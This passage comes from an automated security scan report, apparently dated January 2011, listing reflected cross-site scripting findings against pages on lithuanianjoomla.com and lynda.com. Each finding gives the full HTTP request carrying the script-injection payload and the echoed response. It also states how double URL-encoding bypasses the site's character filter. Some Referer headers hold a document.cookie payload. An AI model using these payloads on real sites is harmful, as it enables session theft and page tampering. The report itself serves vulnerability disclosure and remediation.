The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24162%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f837d9381b was submitted in the REST URL parameter 1. This input was echoed as 24162"><script>alert(1)</script>0f837d9381b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /saugi-joomla24162%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f837d9381b/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:40 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/saugi-joomla24162"><script>alert(1)</script>0f837d9381b/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html" />
...[SNIP]...

4.1237. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ebcd%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eb333f069742 was submitted in the REST URL parameter 2. This input was echoed as 5ebcd"><img src=a onerror=alert(1)>b333f069742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /saugi-joomla/5ebcd%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eb333f069742 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/saugi-joomla/5ebcd"><img src=a onerror=alert(1)>b333f069742" />
...[SNIP]...

4.1238. http://www.lithuanianjoomla.com/templates/beez_20/css/general.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/css/general.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1569d%2522%253e%253ca%2520b%253dc%253eae4191a6da8 was submitted in the REST URL parameter 4. This input was echoed as 1569d"><a b=c>ae4191a6da8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/css/1569d%2522%253e%253ca%2520b%253dc%253eae4191a6da8 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/1569d"><a b=c>ae4191a6da8" />
...[SNIP]...

4.1239. http://www.lithuanianjoomla.com/templates/beez_20/css/general_konqueror.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/css/general_konqueror.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d7e0%2522a%253d%2522b%252267286fd9055 was submitted in the REST URL parameter 4. This input was echoed as 5d7e0"a="b"67286fd9055 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/css/5d7e0%2522a%253d%2522b%252267286fd9055 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/5d7e0"a="b"67286fd9055" />
...[SNIP]...

4.1240. http://www.lithuanianjoomla.com/templates/beez_20/css/layout.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/css/layout.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810eb%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253ef5ac2d2bb51 was submitted in the REST URL parameter 4. This input was echoed as 810eb"><x style=x:expression(alert(1))>f5ac2d2bb51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/css/810eb%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253ef5ac2d2bb51 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/810eb"><x style=x:expression(alert(1))>f5ac2d2bb51" />
...[SNIP]...

4.1241. http://www.lithuanianjoomla.com/templates/beez_20/css/personal.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/css/personal.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31940%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253eece9984528c was submitted in the REST URL parameter 4. This input was echoed as 31940"><x style=x:expression(alert(1))>ece9984528c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/css/31940%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253eece9984528c HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/31940"><x style=x:expression(alert(1))>ece9984528c" />
...[SNIP]...

4.1242. http://www.lithuanianjoomla.com/templates/beez_20/css/position.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/css/position.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99a52%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e492a0e0082e was submitted in the REST URL parameter 4. This input was echoed as 99a52"><img src=a onerror=alert(1)>492a0e0082e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/css/99a52%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e492a0e0082e HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/99a52"><img src=a onerror=alert(1)>492a0e0082e" />
...[SNIP]...

4.1243. http://www.lithuanianjoomla.com/templates/beez_20/css/print.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/css/print.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5411f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9ac2645424 was submitted in the REST URL parameter 4. This input was echoed as 5411f"><img src=a onerror=alert(1)>9ac2645424 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/css/5411f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9ac2645424 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:05 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/5411f"><img src=a onerror=alert(1)>9ac2645424" />
...[SNIP]...

4.1244. http://www.lithuanianjoomla.com/templates/beez_20/javascript/hide.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/javascript/hide.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb32%2522a%253d%2522b%25225278668874e was submitted in the REST URL parameter 4. This input was echoed as 5eb32"a="b"5278668874e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/javascript/5eb32%2522a%253d%2522b%25225278668874e HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 19189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/javascript/5eb32"a="b"5278668874e" />
...[SNIP]...

4.1245. http://www.lithuanianjoomla.com/templates/beez_20/javascript/md_stylechanger.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/templates/beez_20/javascript/md_stylechanger.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138ab%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9db6c5caf79 was submitted in the REST URL parameter 4. This input was echoed as 138ab"><img src=a onerror=alert(1)>9db6c5caf79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/beez_20/javascript/138ab%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9db6c5caf79 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:35 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/javascript/138ab"><img src=a onerror=alert(1)>9db6c5caf79" />
...[SNIP]...

4.1246. http://www.lithuanianjoomla.com/templates/system/css/system.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/templates/system/css/system.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b767%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e5cd244f2c6a was submitted in the REST URL parameter 4. This input was echoed as 5b767"><img src=a onerror=alert(1)>5cd244f2c6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /templates/system/css/5b767%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e5cd244f2c6a HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 19205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/system/css/5b767"><img src=a onerror=alert(1)>5cd244f2c6a" />
...[SNIP]...

4.1247. http://www.lynda.com/landing/softwaretraining.aspx [AWKeyWord parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lynda.com
Path:	/landing/softwaretraining.aspx

Issue detail

The value of the AWKeyWord request parameter is copied into the HTML document as plain text between tags. The payload c9632<script>alert(1)</script>217befb9173 was submitted in the AWKeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!c9632<script>alert(1)</script>217befb9173&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw5CYMQ; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=x1jrynjqotcfa2rylamwqo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x1jrynjqotcfa2rylamwqo55; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:44:06 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:44:06 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:44:06 GMT; path=/
X-Powered-By: ASP.NET
From: 284444-web5
Date: Tue, 25 Jan 2011 04:44:05 GMT
Connection: close
Content-Length: 25346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<span id="lblFullNameC">Joomla!c9632<script>alert(1)</script>217befb9173</span>
...[SNIP]...

4.1248. http://www.lynda.com/landing/softwaretraining.aspx [AWKeyWord parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lynda.com
Path:	/landing/softwaretraining.aspx

Issue detail

The value of the AWKeyWord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e443"><script>alert(1)</script>5be96c53ac6 was submitted in the AWKeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!3e443"><script>alert(1)</script>5be96c53ac6&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw9CYMY; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=urwlgknvan4k0t30g0swfo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=urwlgknvan4k0t30g0swfo55; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:44:02 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:44:02 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:44:02 GMT; path=/
X-Powered-By: ASP.NET
From: 284448-web9
Date: Tue, 25 Jan 2011 04:44:01 GMT
Connection: close
Content-Length: 25380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<meta name="Description" content="Award winning training, tutorials and courses on Joomla!3e443"><script>alert(1)</script>5be96c53ac6 from lynda.com" />
...[SNIP]...

4.1249. http://www.lynda.com/landing/softwaretraining.aspx [Ptitle parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lynda.com
Path:	/landing/softwaretraining.aspx

Issue detail

The value of the Ptitle request parameter is copied into the HTML document as text between TITLE tags. The payload afa34</title><script>alert(1)</script>90dcbb388f5 was submitted in the Ptitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

